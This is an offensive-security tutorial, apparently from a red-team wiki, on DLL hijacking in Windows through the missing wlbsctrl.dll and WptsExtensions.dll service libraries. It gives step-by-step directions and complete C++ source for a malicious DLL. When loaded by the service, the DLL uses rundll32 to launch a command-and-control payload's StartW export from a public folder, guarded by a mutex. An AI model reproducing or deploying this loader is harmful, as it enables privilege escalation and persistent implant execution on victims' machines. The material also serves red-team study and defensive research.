DLL Hijacking

A DLL hijack is potentially achievable when a directory within the “standard search order” is writeable by a malicious actor. The attack is exponentially simplified when DLLs are missing on the target system. This occurs in older version of Microsoft Windows (Vista, 7, and 8) with the wlbsctrl.dll. Newer versions of Windows have a similarly predictable issue with the “schedule” service WptsExtensions.dll.

Process

The IEEXT service attempts to call the “main” function in wlbsctrl.dll. This functionality is not compatible with prevalent C2 framework DLL payloads. A custom DLL is therefore needed to invoke the “StartW” method. Compile a DLL using a modified version of the code snippet below; provide a correct (1) payload location and (2) unique mutex. Upload the malicious DLL in the insecure PATH folder.

---

#include <windows.h>
#include <string>
#include <iostream>
#include "Shlwapi.h"
#include "shlobj.h"
#include "pch.h"


DWORD WINAPI executeProcess(LPVOID lpParam);
BOOL APIENTRY DllMain(HMODULE hModule,
	DWORD  ul_reason_for_call,
	LPVOID lpReserved
)
{
	switch (ul_reason_for_call)
	{
	case DLL_PROCESS_ATTACH:
		executeProcess(NULL); //When main is called, go to executeProcess
		break;
	case DLL_THREAD_ATTACH:
	case DLL_THREAD_DETACH:
	case DLL_PROCESS_DETACH:
		break;
	}
	return TRUE;
}

DWORD Return1() {
	return 1;
}

//Spawns a new process
DWORD WINAPI executeProcess(LPVOID lpParam) {
	STARTUPINFO  info = { 0 };
	PROCESS_INFORMATION   processInfo;

	//Create a uniquely named mutex. 
	CreateMutexA(0, FALSE, "Local\\<UNIQUE_NAME>");
	if (GetLastError() == ERROR_ALREADY_EXISTS)
	{
		return 0;
	}
	else
	{
		//If using as a .dll hijack only use/manipulate the following code
		
		std::wstring rundllStart = L"C:\\Windows\\System32\\rundll32.exe C:\\Users\\Public\\<payload.dll>,StartW";

		//Spawn the new process
		BOOL hR = CreateProcess(NULL, (LPWSTR)rundllStart.c_str(), NULL, NULL, TRUE, 0, NULL, NULL, &info, &processInfo);
		if (hR == 0) {
			return 1;
		}
	}

	return 0;
}